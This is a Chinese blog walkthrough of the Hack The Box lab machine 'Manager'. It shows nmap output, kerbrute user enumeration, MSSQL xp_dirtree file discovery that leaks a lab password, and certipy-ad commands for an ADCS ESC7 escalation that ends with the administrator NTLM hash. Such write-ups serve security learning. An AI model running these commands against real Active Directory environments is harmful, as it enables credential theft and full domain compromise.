首页 > 其他分享 >htb manager

htb manager

时间:2025-01-07 23:24:02浏览次数:1  
标签:htb Windows tcp manager open Microsoft

nmap -sC -sV -p- -v -Pn -T4 10.10.11.236
Host is up (0.22s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|
Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-06 16:22:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-06T16:23:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-06T05:46:17
| Not valid after: 2055-01-06T05:46:17
| MD5: 346f d375 c363 4b3c d3b1 400e 6689 28df
|SHA-1: bd8f a0a9 3270 3fa0 7874 6ecd c492 bc02 bc4f 9fa4
| ms-sql-ntlm-info:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|
Product_Version: 10.0.17763
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:57+00:00; +7h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|http-server-header: Microsoft-HTTPAPI/2.0
|http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49793/tcp open msrpc Microsoft Windows RPC
64371/tcp open tcpwrapped
64411/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|
Message signing enabled and required
|clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|
TCP port: 1433
| smb2-time:
| date: 2025-01-06T16:23:17
|
start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 432.03 seconds
Raw packets sent: 196768 (8.658MB) | Rcvd: 232 (10.208KB)

./kerbrute userenum -d manager.htb --dc 10.10.11.236 ./dict/seclists/Usernames/cirt-default-usernames.txt
image

枚举出用户
operator@manager.htb
image

operator账号登录mssql
image

发现可以使用xp_dirtree过程调用
发现web文件
image

下载
发现配置文件
image

查看内容

dc01.manager.htb 389 0 dc=manager,dc=htb microsoft raven@manager.htb R4v3nBe5tD3veloP3r!123 cn cn=Operator1,CN=users,dc=manager,dc=htb 得到用户密码 ![image](/i/l/?n=24&i=blog/3405761/202501/3405761-20250107231047454-1274655490.png)

raven@manager.htbR4v3nBe5tD3veloP3r!123
尝试winrm连接,成功登录得到user.txt
image

Get-WindowsFeature -Name AD-Certificate
发现安装了adcs

image

adcs漏洞枚举
certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout -dc-ip 10.10.11.236 -debug

image

esc7漏洞利用
将用户添加到officer组
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -add-officer raven
image

启用SubCA
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -enable-template SubCA
image

申请证书
certipy-ad req -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -template SubCA -target dc01.manager.htb -upn administrator@manager.htb
image

certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -issue-request 24
image

certipy-ad req -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -template SubCA -target dc01.manager.htb -upn administrator@manager.htb -retrieve 24
image

certipy-ad auth -pfx administrator.pfx
image

发现时钟差异过大、同步时钟
ntpdate 10.10.11.236

image

发起认证获取管理员hash
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
image

得到hash,后半部分为ntlm hash
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

image

标签:htb,Windows,tcp,manager,open,Microsoft
From: https://www.cnblogs.com/v3n0m-cccccc/p/18658633

相关文章

  • htb Sauna
    扫描端口nmap-sC-sV-p--Pn-v-T410.10.10.175Hostisup(0.41slatency).Notshown:65515filteredtcpports(no-response)PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpMicrosoftIIShtt......
  • 【Prometheus】【Alertmanager】手把手教你安装v0.28.0-rc.0版本
    本文用来演示下载安装Alertmanager的v0.28.0-rc.0版本(Linux64位),具体可以按照以下步骤进行:1.下载Alertmanager压缩包首先,你需要通过curl或wget命令来下载alertmanager的压缩包。使用curl命令下载:curl-LOhttps://github.com/prometheus/alertmanager/r......
  • AppDomainManager注入是一种针对.NET应用程序的高级攻击技术,攻击者通过操控AppDomain
    什么是APPDomainManager注入?APPDomainManager注入通常涉及到利用**应用程序域(AppDomain)**来执行恶意操作,特别是在.NET环境下。要理解这个概念,我们需要了解几个关键术语:AppDomain:在.NET应用程序中,AppDomain是一个隔离的执行环境,它允许多个应用程序或应用程序的不同部分在同一进......
  • RecorderManager.onFrameRecorded
    RecorderManager.onFrameRecorded(functionlistener)小程序插件:支持功能描述监听已录制完指定帧大小的文件事件。如果设置了frameSize,则会回调此事件。参数functionlistener已录制完指定帧大小的文件事件的监听函数参数Objectres属性类型说明frameBuffer......
  • RecorderManager.onInterruptionBegin
    RecorderManager.onInterruptionBegin(functionlistener)基础库2.3.0开始支持,低版本需做兼容处理。小程序插件:支持功能描述监听录音因为受到系统占用而被中断开始事件。以下场景会触发此事件:微信语音聊天、微信视频聊天。此事件触发后,录音会被暂停。pause事件在此事件......
  • 什么是PMI(Purchasing Managers‘ Index,采购经理指数)?中英双语
    中文版什么是PMI?PMI(PurchasingManagers’Index,采购经理指数)是一种衡量经济活动和商业环境的经济指标。它通过调查企业采购经理的采购和生产活动情况,反映制造业和服务业的经营状况及发展趋势。PMI通常分为两类:制造业PMI:反映制造业生产、订单、库存、供应和雇佣情况。服......
  • Redis可视化工具 Another Redis Desktop Manager工具使用详细教程(附下载链接)
    Redis可视化工具推荐:AnotherRedisDesktopManagerRedis是一种高性能的键值数据库,广泛应用于缓存和消息队列等场景。对于开发者来说,命令行工具固然强大,但操作繁琐。而一款高效易用的可视化工具可以极大地提升使用效率。本篇将为大家推荐一款开源、跨平台且功能强大的Redis可......
  • HTB Broker
    nmap端口扫描nmap-sC-sV-p--v-Pn-T410.10.11.243Hostisup(0.38slatency).Notshown:65526closedtcpports(reset)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.9p1Ubuntu3ubuntu0.4(UbuntuLinux;protocol2.0)|ssh-hostke......
  • CacheManager.on
    CacheManager.on(stringeventName,functionhandler)基础库2.24.0开始支持,低版本需做兼容处理。小程序插件:不支持相关文档:弱网体验优化功能描述监听事件。参数stringeventName事件名eventName的合法值值说明最低版本request发生wx.request请......
  • CacheManager.addRules
    Array.CacheManager.addRules(Array.<(string|RegExp|Record.<string,any>)>rules)基础库2.24.0开始支持,低版本需做兼容处理。小程序插件:不支持相关文档:弱网体验优化功能描述批量添加规则,规则写法可参考CacheManager.addRule。参数Array.<(string|RegExp|Rec......